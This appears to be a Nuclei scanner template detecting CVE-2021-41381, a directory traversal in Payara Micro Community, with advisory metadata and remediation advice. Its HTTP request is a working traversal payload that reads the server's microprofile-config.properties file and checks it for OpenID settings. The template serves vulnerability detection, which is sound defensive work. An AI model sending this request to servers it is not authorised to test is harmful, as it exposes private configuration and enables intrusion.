44 lines
1.7 KiB
YAML
44 lines
1.7 KiB
YAML
id: CVE-2021-41381
|
|
|
|
info:
|
|
name: Payara Micro Community 5.2021.6 Directory Traversal
|
|
author: pikpikcu
|
|
severity: high
|
|
description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
|
|
impact: |
|
|
An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
|
|
remediation: |
|
|
Upgrade to a patched version of Payara Micro Community or apply the necessary security patches to mitigate the directory traversal vulnerability.
|
|
reference:
|
|
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41381
|
|
- https://www.payara.fish
|
|
- http://packetstormsecurity.com/files/164365/Payara-Micro-Community-5.2021.6-Directory-Traversal.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-41381
|
|
cwe-id: CWE-22
|
|
epss-score: 0.10127
|
|
epss-percentile: 0.94346
|
|
cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: payara
|
|
product: micro_community
|
|
tags: cve,cve2021,payara,lfi,packetstorm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "payara.security.openid.default.providerURI="
|
|
- "payara.security.openid.sessionScopedConfiguration=true"
|
|
condition: and
|
|
# digest: 490a00463044022002f7bccc93088eb475740ab01423b1c88fe734b7365f6c83c3401b197d8daadd02205aa816caf11f12239b315bd78dc27afa05498d5081a96ecaaa65a9f94cc77e77:922c64590222798bb761d5b6d8e72950 |